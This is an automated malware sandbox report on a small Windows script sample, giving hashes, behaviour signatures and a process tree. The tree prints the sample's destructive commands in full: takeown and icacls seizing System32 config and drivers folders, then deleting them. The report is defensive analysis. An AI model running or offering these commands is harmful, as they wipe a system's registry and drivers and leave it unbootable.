Analysis
- max time kernel: 121s
- max time network: 125s
- platform: windows7_x64
- resource: win7-20240708-en
- resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
- submitted: 15-08-2024 21:31
Static task: static1
Behavioral task: behavioral1
- Sample: file.wsf
- Resource: win7-20240708-en
General
- Target: file.wsf
- Size: 2KB
- MD5: b39eb8682deec9c7a7edcb64512655b0
- SHA1: d412384d9cfd8ec2333146eb1dd6c137543dabc7
- SHA256: 9f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27
- SHA512: 539eaf53ac7f79416519742ba365d0e5d4c8ebc78ba59d8cf5b6f677e7f35fe99d42c3802245d7c5a68e7377d9b88a528fa495fc5b45a01f467fa5705a4af625
Malware Config
Signatures
- Possible privilege escalation attempt (4 IoCs)
  Processes (pid, process): 2656 takeown.exe; 2672 takeown.exe; 2728 icacls.exe; 2232 icacls.exe
- Modifies file permissions (1 TTPs, 4 IoCs)
  Processes (pid, process): 2656 takeown.exe; 2672 takeown.exe; 2728 icacls.exe; 2232 icacls.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Opens file in notepad (likely ransom note) (1 IoCs)
  Processes (pid, process): 2868 Notepad.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes (description, pid, process): Token: SeTakeOwnershipPrivilege, 2672 takeown.exe
- Suspicious use of WriteProcessMemory (21 IoCs)
  Processes (description, pid, process, target process); each entry is recorded 3 times in the report:
  PID 1664 wrote to memory of 568: 1664 cmd.exe -> WScript.exe (3 entries)
  PID 568 wrote to memory of 2760: 568 WScript.exe -> cmd.exe (3 entries)
  PID 568 wrote to memory of 2984: 568 WScript.exe -> cmd.exe (3 entries)
  PID 2760 wrote to memory of 2656: 2760 cmd.exe -> takeown.exe (3 entries)
  PID 2984 wrote to memory of 2672: 2984 cmd.exe -> takeown.exe (3 entries)
  PID 2760 wrote to memory of 2728: 2760 cmd.exe -> icacls.exe (3 entries)
  PID 2984 wrote to memory of 2232: 2984 cmd.exe -> icacls.exe (3 entries)
Processes (indented by depth in the process tree)
- [1] C:\Windows\system32\cmd.exe
  Command line: cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"
  Signatures: Suspicious use of WriteProcessMemory
  PID: 1664
  - [2] C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"
    Signatures: Suspicious use of WriteProcessMemory
    PID: 568
    - [3] C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
      Signatures: Suspicious use of WriteProcessMemory
      PID: 2760
      - [4] C:\Windows\system32\takeown.exe
        Command line: takeown /f c:\windows\system32\config\*
        Signatures: Possible privilege escalation attempt; Modifies file permissions
        PID: 2656
      - [4] C:\Windows\system32\icacls.exe
        Command line: icacls c:\windows\system32\config\* /grant everyone:(f)
        Signatures: Possible privilege escalation attempt; Modifies file permissions
        PID: 2728
    - [3] C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
      Signatures: Suspicious use of WriteProcessMemory
      PID: 2984
      - [4] C:\Windows\system32\takeown.exe
        Command line: takeown /f c:\windows\system32\drivers\*
        Signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
        PID: 2672
      - [4] C:\Windows\system32\icacls.exe
        Command line: icacls c:\windows\system32\drivers\* /grant everyone:(f)
        Signatures: Possible privilege escalation attempt; Modifies file permissions
        PID: 2232
- [1] C:\Windows\System32\Notepad.exe
  Command line: "C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\UnprotectAssert.vbs
  Signatures: Opens file in notepad (likely ransom note)
  PID: 2868
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 2KB
  MD5: b39eb8682deec9c7a7edcb64512655b0
  SHA1: d412384d9cfd8ec2333146eb1dd6c137543dabc7
  SHA256: 9f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27
  SHA512: 539eaf53ac7f79416519742ba365d0e5d4c8ebc78ba59d8cf5b6f677e7f35fe99d42c3802245d7c5a68e7377d9b88a528fa495fc5b45a01f467fa5705a4af625
- Filesize: 98B
  MD5: 4b91264568ac2162700be36338c095e8
  SHA1: c95726edf8303e6adabcb12ffdca90b51349990a
  SHA256: 2c8545e54e8fbc28791314d7327886237c66b70640d069f276a35b6c3322c037
  SHA512: e57319453e5da3407ccc77cb3ee6200592e1916932cae467bbf77722f3ff49e5853b4b4d2eeb3092dbb2e22346f56617cc785744771bb3648bf4561feb0e9e1b